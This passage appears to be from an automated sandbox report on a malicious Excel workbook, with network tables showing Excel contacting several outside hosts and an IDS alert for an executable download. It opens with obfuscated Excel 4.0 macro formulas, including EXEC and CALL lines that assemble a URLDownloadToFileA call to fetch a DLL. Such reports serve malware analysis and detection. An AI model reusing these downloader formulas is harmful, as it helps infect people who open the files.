2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/07/21-09:15:05.069854 | TCP | 2009897 | ET TROJAN Possible Windows executable sent when remote host claims to send html content | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 09:15:00.919925928 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:00.938839912 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:00.938941002 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:00.939644098 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.000272989 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.327353001 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.327575922 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.327745914 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.345602989 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.642882109 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.661051989 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.661165953 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.662440062 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.720390081 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063385963 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063426018 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063682079 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:02.063886881 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:02.082295895 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.227967978 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.368988037 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.369075060 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.370420933 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.511811972 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.678519964 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.678713083 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.679001093 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.679055929 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:03.095360994 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.236845970 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:03.236989975 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.238714933 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.379930973 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.319272041 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.319385052 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:04.322556973 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.322618008 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:04.757160902 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:04.909230947 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:04.909307957 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:04.909897089 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.061911106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069854021 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069907904 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069946051 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069962025 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.069993019 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069997072 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070035934 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070048094 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070066929 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070092916 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070121050 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070123911 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070166111 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070178032 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070204973 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070215940 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070241928 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070265055 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070295095 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.075287104 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222563028 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222589016 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222600937 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222616911 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222716093 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222773075 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222807884 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222825050 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222858906 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222881079 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222891092 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222898960 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222946882 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222951889 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222999096 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223002911 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223022938 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223031998 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223054886 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223071098 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223072052 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223112106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223112106 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223133087 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223151922 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223151922 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223191023 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223208904 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223228931 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223232031 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223253012 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223280907 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223311901 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.225841045 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.228734970 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.376903057 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.376960993 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.376991987 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:00.904869080 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:01.338613033 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:01.638679981 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:02.082560062 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:02.225878000 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:02.689320087 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:03.091237068 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:04.330058098 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:04.754915953 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:01.338613033 CEST | 192.168.2.22 | 8.8.8.8 | 0x5115 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:02.082560062 CEST | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:02.689320087 CEST | 192.168.2.22 | 8.8.8.8 | 0x9610 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:04.330058098 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.904869080 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:01.638679981 CEST | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:02.225878000 CEST | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | 192.185.56.250 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:03.091237068 CEST | 8.8.8.8 | 192.168.2.22 | 0x9610 | No error (0) | 103.211.216.55 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:04.754915953 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | 111.118.215.222 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:00.939644098 CEST | 0 | OUT | |
Apr 7, 2021 09:15:01.327353001 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:01.662440062 CEST | 2 | OUT | |
Apr 7, 2021 09:15:02.063385963 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 192.185.56.250 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:02.370420933 CEST | 3 | OUT | |
Apr 7, 2021 09:15:02.678519964 CEST | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49170 | 103.211.216.55 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:03.238714933 CEST | 4 | OUT | |
Apr 7, 2021 09:15:04.319272041 CEST | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49171 | 111.118.215.222 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:04.909897089 CEST | 6 | OUT | |
Apr 7, 2021 09:15:05.069854021 CEST | 7 | IN |